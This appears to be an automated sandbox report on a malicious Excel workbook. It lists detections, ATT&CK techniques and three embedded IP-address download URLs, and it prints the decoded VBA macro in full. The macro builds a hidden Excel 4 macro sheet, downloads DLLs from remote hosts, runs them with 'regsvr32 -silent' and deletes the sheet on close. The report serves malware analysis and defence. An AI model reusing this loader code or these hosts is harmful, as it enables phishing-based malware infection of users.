MALICIOUS
226
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, specifically triggering Workbook_Open and Auto_Open events. These macros likely use the URLDownloadToFile API, as indicated by the SC_STR_URLDOWNLOAD heuristic, to fetch and execute a payload from one of the embedded URLs. The ClamAV detection further confirms its malicious nature, classifying it as Xls.Malware.Valyria-10029771-0.
Heuristics 8
-
ClamAV: Xls.Malware.Valyria-10029771-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10029771-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Sheets("Sheet5").Range("G12") = "..\Xertis2.dll" Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Xertis.dll" Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Xertis1.dll" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean) If Not m_openAlreadyRan Then Workbook_Open End Sub -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open() On Error Resume Next -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub auto_close() On Error Resume Next -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://188.165.62.10/ In document text (OLE body)
- http://185.82.202.248/In document text (OLE body)
- http://84.246.85.241/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3979 bytes |
SHA-256: 5a93fdb6f254ca5fb402631b6f65405fa671c41dc19a0d9e83d6d2bc3ec0b2be |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
If Not m_openAlreadyRan Then Workbook_Open
End Sub
Private Sub asWorkbook_Activateas()
On Error Resume Next
If m_isOpenDelayed Then
m_isOpenDelayed = False
InitWorkbook
End If
End Sub
Private Sub saWorkbook_Opensa()
On Error Resume Next
m_openAlreadyRan = True
Dim objProtectedViewWindow As ProtectedViewWindow
'
Set objProtectedViewWindow = Application.ProtectedViewWindows(Me.Name)
On Error GoTo 0
'
m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
If Not m_isOpenDelayed Then InitWorkbook
End Sub
Private Sub ssaaInitWorkbookssaa()
On Error Resume Next
If VBA.Val(Application.Version) < 12 Then
MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
Me.Close False
Exit Sub
End If
'
'Other code
'
'
'
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub auto_open()
On Error Resume Next
Drezden = "="
Application.ScreenUpdating = False
Gert
Sheets("Sheet5").Visible = False
Sheets("Sheet5").Range("A1:M100").Font.Color = vbWhite
Sheets("Sheet5").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet5").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet5").Range("H26") = UserForm1.Label4.Caption
Sheets("Sheet5").Range("K17") = "=NOW()"
Sheets("Sheet5").Range("K18") = ".dat"
Sheets("Sheet5").Range("K18") = ".dat"
Sheets("Sheet5").Range("H35") = "=HALT()"
Sheets("Sheet5").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet5").Range("I10") = UserForm1.Caption
Sheets("Sheet5").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet5").Range("I12") = "Byukilos"
Sheets("Sheet5").Range("G10") = "..\Xertis.dll"
Sheets("Sheet5").Range("G11") = "..\Xertis1.dll"
Sheets("Sheet5").Range("G12") = "..\Xertis2.dll"
Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
Sheets("Sheet5").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
Sheets("Sheet5").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet5").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet5").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet5").Range("H9") = Drezden & "REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet5").Range("H17") = Drezden & "EXEC(I17)"
Sheets("Sheet5").Range("H18") = Drezden & "EXEC(I18)"
Sheets("Sheet5").Range("H19") = Drezden & "EXEC(I19)"
Application.Run Sheets("Sheet5").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet5").Delete
Application.DisplayAlerts = True
End Sub
Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet5"
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C41A3DA9-9E4E-4E34-AE8A-E46E95CD3254}{C8DFB01A-A872-44D6-88E7-C94D7F4BB6E3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.